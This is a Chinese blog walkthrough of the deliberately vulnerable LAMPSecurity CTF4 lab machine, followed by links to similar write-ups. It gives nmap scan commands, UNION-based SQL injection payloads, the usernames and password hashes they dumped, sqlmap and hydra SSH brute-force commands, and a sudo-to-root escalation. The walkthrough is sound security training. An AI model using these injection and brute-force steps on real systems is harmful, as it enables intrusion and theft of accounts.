【学渗透靶机——lampSecurityCTF4】

已于 2023-06-21 17:18:30 修改
阅读量285 收藏 1
点赞数
分类专栏: 靶机学习 文章标签: 数据库 web安全
于 2023-05-13 21:06:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jieli0901227/article/details/130659711
版权

lampSecurityCTF4

信息收集

主机信息收集

主机ip:

oot@kali:~# nmap -sn 192.168.241.0/24

在这里插入图片描述

主机开放的端口

root@kali:~# nmap --min-rate 10000 -p- 192.168.241.152

在这里插入图片描述

主机开放端口版本

nmap -sT -sV -O  -p22,25,80  192.168.241.152

在这里插入图片描述
nmap 主机漏洞探测

# nmap --script=vuln -p22,25,80  192.168.241.152

扫描出也没什么有用信息

web 信息收集

访问80 端口

在这里插入图片描述

手工注入测试

1、通过浏览页面发现
http://192.168.241.152/index.html?page=blog&title=Blog&id=2 地址存在注入
在这里插入图片描述

2、使用 order by 判断数据库的列
http://192.168.241.152/index.html?page=blog&title=Blog&id=2 order by 3%20-- -

测试数据库有5列
3、使用联合注入找报错点
在这里插入图片描述

4、查询当前数据库有哪些表

id=-2%20 union select 1,2,group_concat(table_name,''),4,5 from information_schema.tables where table_schema=database() -- -

在这里插入图片描述
5、查询user 表的字段信息

id=-2%20 union select 1,2,group_concat(column_name,''),4,5 from information_schema.columns where table_name='user' -- -

user_id,user_name,user_pass,Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections by 5

在这里插入图片描述
6、查询账号密码

id=-2%20 union select 1,2,group_concat(user_name,'--',user_pass),4,5 from user -- -

----------------
dstevens--02e823a15a392b5aa4ff4ccb9060fa68
achen--b46265f1e7faa3beab09db5c28739380
pmoore--8f4743c04ed8e5f39166a81f26319bb5
jdurbin--7c7bc9f465d86b8164686ebb5151a717
sorzek--64d1f88b9b276aece4b0edcc25b7a434
ghighland--9f3eb3087298ff21843cc4e013cf355f

在这里插入图片描述
通过在线密码破解
在这里插入图片描述

sqlmap 自动化注入

kali@kali:~$ sqlmap -u 'http://192.168.241.152/index.html?page=blog&title=Blog&id=2'  --dbs --batch --dump

在这里插入图片描述

ssh 爆破

root@kali:/root/baji_100/lampSeccurityCTF4# hydra -L user.lst  -P pass.lst  -f -T 10 -vV 192.168.241.152 ssh

在这里插入图片描述

获取系统初始shell

ssh 登录

Unable to negotiate with 192.168.241.152 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

在这里插入图片描述

 ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss  -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1   dstevens@192.168.241.152

在这里插入图片描述

提权

发现sudo - l 发现该账号sudo 可执行root 所有命令,并且不需要密码
在这里插入图片描述
直接起个bash
在这里插入图片描述

懒惰的老鼠
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF之LAMPSecurity CTF4 靶机渗透(SQL注入)
afei001
08-06 904
  练习环境     攻击机:kali     靶机:LAMPSecurity: CTF4     下载地址:https://download.vulnhub.com/lampsecurity/ctf4.zip      1.发现靶机端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.99.177 netmask 255.
LAMPSecurity——CTF4
qq_51175992的博客
10-11 155
这个靶场总体来说比较简单(比上周做的DC系列更简单),正常的nmap进行端口信息收集,然后在Web页面发现SQL注入漏洞,借助sqlmap顺利拿到用户和其密码信息。但是在SSH爆破时因为靶场时间太久了,密钥交换的算法不一致导致被一直无法正常爆破,后来通过大佬的指点通过设置密钥算法的参数完成登录。最后的提权部分就是/bin/bash提权就行。
靶机精讲之CTF4
m0_63285023的博客
04-11 614
根据扫描服务提供的shh端口登录(22端口)发现index可进行手动爆破(地址包含)ssh不同版本的通讯不一样会导致报错。查看权限sudo -l pwd翻目录。80,25(明确版本)攻击面更大。复制密码user——pass。blog是交互式的程序。复制原网址(有注入网址)-dbs枚举操作系统。尝试sqlmap注入。或许会遇到这样的错误。
打靶 LAMPSECURITY: CTF4
Mysmycbx的博客
03-12 187
LAMPSECURITY: CTF4
ctf php168,CTF靶场系列-LAMPSecurity: CTF4
weixin_39805409的博客
04-01 201
下载地址https://download.vulnhub.com/lampsecurity/ctf4.zip实战演练使用netdiscover命令查找靶机的IP。使用nmap查看靶机开放的端口打开浏览器使用avws进行扫描目录遍历漏洞注入POST /admin/index.php HTTP/1.1Content-Length: 149Content-Type: application/x-www-...
vulhub渗透测试靶机习1
08-08
渗透测试靶机习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
DC-4-Web渗透测试靶机
最新发布
01-19
DC-4
OWASP靶机、安全习、测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
LampSecurityCTF4靶场练习
qq_44484541的博客
04-04 166
提权,由于是比较高的权限,我们可能直接创建一个bash进行提权,成功获得root权限,但还是存在一些信息无法查看的情况,但也不影响。------查看当前用户的权限,目前是获得了一个ALL ALL的权限 比较高的权限。访问网页,使用单引号确认是否真实存在sql注入,发现报错,确认真实存在注入。------通过数据库枚举找到了数据库中的账户密码信息并被破解了出来。通过使用以下参数使算法一致,将出现报错的算法粘贴在参数后。通过爆破出来账户密码,使用ssh测试是否可用。------发现网站存在sql注入漏洞。
CTF4靶机训练
weixin_44132032的博客
08-19 3949
CTF4靶机训练环境下载主机发现端口扫描漏洞挖掘SSH利用权限提升 环境下载 链接:https://pan.baidu.com/s/1Kb4RKtnZ5RD43FAnjlYlsg 提取码:d59k Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。 主机发现 使用命令: netdiscover 端口扫描 使用命令: namp -A -sS -sV -p- 目标主机IP 扫描得出目...
渗透CTF4靶机
weixin_44901204的博客
08-21 856
环境: 渗透机:Kali 靶机:CTF4 Kali与CTF4在同一网段 1.主机发现 nmap -v -Pn 10.10.10.0/24 使用扫描10网段,发现该网段存活的主机。 扫描结果如下: 发现CTF4开放了22,25,80端口。 22端口为ssh,远程登录协议 25端口为smtp,简单邮件传输协议 80端口为http服务。 2.页面测试 用火狐连接后,进行单引号测试(&id=2...
红队打靶:LampSecurity:CTF4打靶思路详解(vulnhub)
Bossfrank的博客
06-19 1436
本文对vulnhub中靶机LampSecurity:CTF4进行了打靶。核心步骤就是发现数据库查询参数->使用sqlmap进行注入->拿到用户名和密码->ssh登录,由于靶机较为老旧,现在我们可以使用许多自动化脚本工具进行渗透,但核心还是要了解渗透的思路和各种针对漏洞的脚本编写原理,而非单纯的使用工具。
CTF4靶机渗透
薛定谔的cat
01-26 1548
环境搭建 攻击机:kali 靶机:CTF4 CTF4靶机靶机下载 点击直接下载. Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。 此次训练其中一步为获取目标的账号密码,故目标环境无需登录。 kali和ctf4 都设置为NAT模式 实战演练 主机发现 kali的IP:192.168.99.132 使用netdiscover命令寻找ctf4的IP: netdiscover -r 192.168.99.0/24 扫描结果如下: ![在这里插入图片描述](https://img-blog.csdnim
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3016
Vulnhub-CTF4靶机实战
ctf4靶机渗透
weixin_45914445的博客
05-24 413
ctf4靶机渗透实验环境:一、实验过程二、使用步骤1.信息收集2.sqlmap进行漏洞利用 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录实验环境:一、实验过程二、使用步骤1.信息收集2.sqlmap进行漏洞利用 实验环境: kali linux的IP地址为192.168.42.137 一、实验过程 1、信息收集 2、漏洞挖掘 3、权限提升 二、使用步骤 1.信息收集 1.1 主机发现 netdiscover -i eth0 -r 192.168.42.0/24
LampSecurity-CTF4 靶场记录
m0_52729465的博客
08-15 155
1、首先进行常规nmap扫描,发现四个端口,22,25,80,631。2、打开web界面,发现不像是英语,而是其他语言,没有可利用信息,再查看–script-vuln扫出来的信息发现可能存在sql注入漏洞,测试后发现存在sql注入漏洞。3、使用sqlmap对数据库进行注入,查看到user表中的数据,里面有六组账号密码,尝试使用ssh登录。4、在ssh登录过程中发现报错,查看报错信息是服务器和客户端的算法不一致导致无法登录,在ssh后面将报错内提供的算法写进参数即可正常使用ssh。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值